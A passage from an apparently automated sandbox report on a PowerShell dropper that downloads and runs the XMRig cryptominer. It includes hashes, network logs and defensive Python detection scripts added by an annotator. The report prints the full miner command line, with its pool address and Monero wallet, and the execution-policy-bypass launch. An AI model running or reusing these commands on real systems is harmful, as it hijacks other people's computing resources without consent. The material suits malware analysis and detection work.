US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ja2olhwu.iee.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:05

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1743s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 109.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmicqbjo.bfw.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:37

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1758s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dngobbiv.uas.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:38

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; the sandbox recorded no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
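The AdjustPrivilegeToken rows are the most host-generic detection point in this run: xmrig enables SeLockMemoryPrivilege because RandomX uses large pages when it can get them, and the PowerShell host enables SeDebugPrivilege. The Python below is an added example, not part of the sandbox report: it applies that rule to Windows Security event 4703 ("A user right was adjusted") records. The records are constructed here to mirror the rows above (the hex ProcessId values are 232 and 3616, the two PIDs in this run's memory dumps); the trusted-directory list, the severities, and the assumption that the "Audit Token Right Adjusted" subcategory is enabled on the endpoint are mine.

```python
"""Flag privilege enables matching this report's AdjustPrivilegeToken rows in
Windows Security event 4703 ("A user right was adjusted") records.

Added example, not part of the report.  The events are constructed to mirror the
signature rows; trusted-directory list and severities are assumptions made here.
"""
import re

# Constructed records using the EventData field names Windows writes for 4703.
# ProcessId is the hex form of 232 (powershell.exe) and 3616 (xmrig.exe).
EVENTS_4703 = [
    {'EventID': 4703, 'SubjectUserName': 'Admin', 'ProcessId': '0xe8',
     'ProcessName': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'EnabledPrivilegeList': 'SeDebugPrivilege', 'DisabledPrivilegeList': '-'},
    {'EventID': 4703, 'SubjectUserName': 'Admin', 'ProcessId': '0xe20',
     'ProcessName': r'C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe',
     'EnabledPrivilegeList': 'SeLockMemoryPrivilege', 'DisabledPrivilegeList': '-'},
    {'EventID': 4703, 'SubjectUserName': 'Admin', 'ProcessId': '0xe20',
     'ProcessName': r'C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe',
     'EnabledPrivilegeList': 'SeLockMemoryPrivilege', 'DisabledPrivilegeList': '-'},
    # constructed benign noise: a system service adjusting a privilege from System32
    {'EventID': 4703, 'SubjectUserName': 'SYSTEM', 'ProcessId': '0x3f4',
     'ProcessName': r'C:\Windows\System32\svchost.exe',
     'EnabledPrivilegeList': 'SeImpersonatePrivilege', 'DisabledPrivilegeList': '-'},
]

# Assumed: binaries under these roots are installed software, not dropped payloads.
TRUSTED_DIRS = re.compile(r'^[A-Za-z]:\\(Windows|Program Files( \(x86\))?)\\')
SCRIPT_HOSTS = {'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'}


def privileges(field):
    """4703 lists privileges separated by whitespace; '-' means none."""
    return [p for p in re.split(r'[\s,]+', field or '') if p and p != '-']


def classify(process, privilege):
    """Return a severity for one (process, privilege) pair, or None if uninteresting."""
    image = process.rsplit('\\', 1)[-1].lower()
    if privilege == 'SeLockMemoryPrivilege' and not TRUSTED_DIRS.match(process):
        # large pages requested by a binary outside Windows / Program Files:
        # the RandomX miner pattern recorded in this report
        return 'high'
    if privilege == 'SeDebugPrivilege' and image in SCRIPT_HOSTS:
        return 'medium'
    return None


def detect_privilege_abuse(events):
    """Aggregate 4703 records into one alert per (pid, process, privilege)."""
    alerts = {}
    for ev in events:
        if ev.get('EventID') != 4703:
            continue
        pid = int(ev['ProcessId'], 16)          # 4703 records the PID as a hex string
        for priv in privileges(ev.get('EnabledPrivilegeList')):
            severity = classify(ev['ProcessName'], priv)
            if severity is None:
                continue
            key = (pid, ev['ProcessName'], priv)
            alert = alerts.setdefault(key, {'pid': pid, 'process': ev['ProcessName'],
                                            'privilege': priv, 'severity': severity,
                                            'count': 0})
            alert['count'] += 1
    return sorted(alerts.values(), key=lambda a: (a['severity'] != 'high', a['pid']))


if __name__ == '__main__':
    for a in detect_privilege_abuse(EVENTS_4703):
        print(f"[{a['severity']}] pid {a['pid']} {a['privilege']} x{a['count']} {a['process']}")
```

The SeLockMemoryPrivilege rule is deliberately path-based rather than name-based: legitimate large-page users (database engines, hypervisors) live under Program Files, so a request from a user-writable directory is the signal, whatever the binary is called.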

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
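The two command lines above carry everything needed to identify and block this miner: a PowerShell launch with `-ExecutionPolicy bypass` of a script in %TEMP%, and an xmrig invocation that names the algorithm, pool, coin, wallet and worker. The Python below is an added example, not code from the sandbox report or from xmrig: it parses both lines (copied verbatim from this analysis) into the fields an analyst would pivot on and emits findings. The `USER_WRITABLE` directory list, the finding wording and the xmrig option table are my assumptions; the option table covers only the switches seen on this page plus their long spellings.

```python
"""Parse the dropper and miner command lines from this analysis into IOCs.

Added example (not sandbox or xmrig code).  Both command lines are copied
verbatim from the Processes section; everything else is an assumption made here.
"""
import re
import shlex
from urllib.parse import urlsplit

POWERSHELL_CMD = ('powershell.exe -ExecutionPolicy bypass -File '
                  '"C:\\Users\\Admin\\AppData\\Local\\Temp\\file01 - copia (8).ps1"')
XMRIG_CMD = ('"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" -a rx '
             '-o stratum+ssl://rx.unmineable.com:443 '
             '-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'
             '.unmineable_worker_vilqtiac -p x')

# Assumed list of directories an unprivileged user can write to.
USER_WRITABLE = re.compile(r'\\(AppData\\Local\\Temp|Downloads|Public|ProgramData)\\', re.I)
# xmrig switches seen on this page plus their long spellings (value-taking / boolean).
XMRIG_VALUE_OPTS = {'-a': 'algo', '--algo': 'algo', '-o': 'url', '--url': 'url',
                    '-u': 'user', '--user': 'user', '-p': 'pass', '--pass': 'pass',
                    '-t': 'threads', '--threads': 'threads'}
XMRIG_FLAG_OPTS = {'-k': 'keepalive', '--keepalive': 'keepalive', '--tls': 'tls',
                   '-B': 'background', '--background': 'background'}
# Standard Monero address: 95 base58 characters starting with 4 (8 for subaddresses).
MONERO_ADDRESS = re.compile(r'[48][1-9A-HJ-NP-Za-km-z]{94}')


def split_windows_cmdline(cmd):
    """Tokenise a Windows command line: posix=False keeps backslashes literal,
    then the surrounding double quotes are stripped from quoted arguments."""
    return [t[1:-1] if len(t) >= 2 and t[0] == t[-1] == '"' else t
            for t in shlex.split(cmd, posix=False)]


def parse_powershell(cmd):
    tokens = split_windows_cmdline(cmd)
    low = [t.lower() for t in tokens]
    info = {'exe': tokens[0], 'execution_policy_bypass': False, 'script': None}
    for i, tok in enumerate(low[:-1]):
        # powershell.exe accepts abbreviated switches; these are the common spellings
        if tok in ('-executionpolicy', '-exec', '-ex', '-ep'):
            info['execution_policy_bypass'] = low[i + 1] in ('bypass', 'unrestricted')
        elif tok in ('-file', '-f'):
            info['script'] = tokens[i + 1]
    info['script_user_writable'] = bool(info['script'] and USER_WRITABLE.search(info['script']))
    return info


def parse_xmrig(cmd):
    tokens = split_windows_cmdline(cmd)
    exe, args, opts, i = tokens[0], tokens[1:], {}, 0
    while i < len(args):
        name, eq, inline = args[i].partition('=')   # accept --url=... as well as --url ...
        if name in XMRIG_VALUE_OPTS and (eq or i + 1 < len(args)):
            opts[XMRIG_VALUE_OPTS[name]] = inline if eq else args[i + 1]
            i += 1 if eq else 2
        else:
            if name in XMRIG_FLAG_OPTS:
                opts[XMRIG_FLAG_OPTS[name]] = True
            i += 1
    url = urlsplit(opts.get('url', ''))
    coin, wallet, worker = None, opts.get('user', ''), None
    if ':' in wallet:                 # unMineable convention: COIN:ADDRESS.WORKER
        coin, wallet = wallet.split(':', 1)
    if '.' in wallet:                 # xmrig convention: ADDRESS.WORKER
        wallet, worker = wallet.split('.', 1)
    return {'exe': exe, 'exe_user_writable': bool(USER_WRITABLE.search(exe)),
            'algo': opts.get('algo'), 'pool_scheme': url.scheme, 'pool_host': url.hostname,
            'pool_port': url.port,
            'pool_tls': url.scheme.endswith(('+ssl', '+tls')) or bool(opts.get('tls')),
            'coin': coin, 'wallet': wallet, 'worker': worker,
            'wallet_is_monero': bool(MONERO_ADDRESS.fullmatch(wallet)),
            'password': opts.get('pass')}


def triage(powershell_cmd, xmrig_cmd):
    """Return (parsed powershell, parsed xmrig, list of human-readable findings)."""
    ps, miner = parse_powershell(powershell_cmd), parse_xmrig(xmrig_cmd)
    findings = []
    if ps['execution_policy_bypass']:
        findings.append('PowerShell started with -ExecutionPolicy Bypass')
    if ps['script_user_writable']:
        findings.append(f"script executed from a user-writable path: {ps['script']}")
    if miner['exe_user_writable']:
        findings.append(f"miner executed from a user-writable path: {miner['exe']}")
    if miner['pool_scheme'].startswith('stratum'):
        findings.append(f"stratum pool {miner['pool_host']}:{miner['pool_port']} "
                        f"({'TLS' if miner['pool_tls'] else 'plaintext'})")
    if miner['pool_port'] in (443, 80, 53):
        findings.append('pool reached on a port normally allowed outbound (blends with web traffic)')
    if miner['algo'] == 'rx':
        findings.append('RandomX algorithm selected (CPU mining, Monero family)')
    return ps, miner, findings


if __name__ == '__main__':
    for line in triage(POWERSHELL_CMD, XMRIG_CMD)[2]:
        print('-', line)
```

The wallet and worker name are the durable indicators here: the pool host and the %TEMP% path change trivially between campaigns, while the payout address ties every run on this page (and any other sample using it) to the same operator.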

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/232-0-0x00007FFD97EF3000-0x00007FFD97EF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rwuj1o30.f0v.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/232-6-0x0000028FA12D0000-0x0000028FA12F2000-memory.dmp

memory/232-10-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/232-11-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/232-12-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/232-14-0x0000028FA17F0000-0x0000028FA1802000-memory.dmp

memory/232-15-0x0000028FA1380000-0x0000028FA138A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3616-46-0x0000020FC3DF0000-0x0000020FC3E10000-memory.dmp

memory/3616-47-0x0000020FC56F0000-0x0000020FC5710000-memory.dmp

memory/3616-48-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/232-49-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/232-51-0x00007FFD97EF3000-0x00007FFD97EF5000-memory.dmp

memory/3616-50-0x0000020FC5710000-0x0000020FC5730000-memory.dmp

memory/232-52-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/3616-53-0x0000020FC5730000-0x0000020FC5750000-memory.dmp

memory/3616-54-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-55-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-57-0x0000020FC5710000-0x0000020FC5730000-memory.dmp

memory/3616-56-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-58-0x0000020FC5730000-0x0000020FC5750000-memory.dmp

memory/3616-59-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-60-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-61-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-62-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-63-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-64-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-65-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-66-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-67-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-68-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-69-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-70-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-71-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-72-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-73-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-74-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-75-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-76-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-77-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-78-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-79-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-80-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-81-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-82-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-83-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-84-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-85-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-86-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-87-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-88-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-89-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-90-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-91-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-92-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-93-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-94-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-95-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-96-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-97-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-98-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-99-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-100-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-101-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-102-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-103-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-104-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-105-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-106-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-107-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-108-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-109-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-110-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-111-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-112-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-113-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-114-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-115-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-116-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-117-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp
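The Files section above lists the same memory region many times, once per snapshot the sandbox took of it. The Python below is an added example, not part of the report: it parses `memory/<pid>-<index>-<start>-<end>-memory.dmp` names, collapses repeated snapshots into one entry per region with a count and index span, separates image-range mappings (the 0x7FF… region where 64-bit Windows maps EXEs and DLLs) from low-address heap regions, and reports sizes that recur under several PIDs. The names are copied from this report (PIDs 232 and 3616 from this run, 2184 from the preceding run, 3452, 2408 and 4072 from later runs); the 1 MiB threshold and the address-range heuristic are assumptions.

```python
"""Summarise the memory dump names listed in the Files sections.

Added example, not part of the report.  The names below are copied from this
report; the image-range and size heuristics are assumptions made here.
"""
import re
from collections import defaultdict

DUMP_NAME = re.compile(r'^memory/(?P<pid>\d+)-(?P<idx>\d+)-'
                       r'0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$')

# A representative subset of the dump names on this page.
DUMPS = """
memory/232-0-0x00007FFD97EF3000-0x00007FFD97EF5000-memory.dmp
memory/232-6-0x0000028FA12D0000-0x0000028FA12F2000-memory.dmp
memory/232-10-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp
memory/232-11-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp
memory/3616-46-0x0000020FC3DF0000-0x0000020FC3E10000-memory.dmp
memory/3616-47-0x0000020FC56F0000-0x0000020FC5710000-memory.dmp
memory/3616-48-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp
memory/3616-54-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp
memory/3616-117-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp
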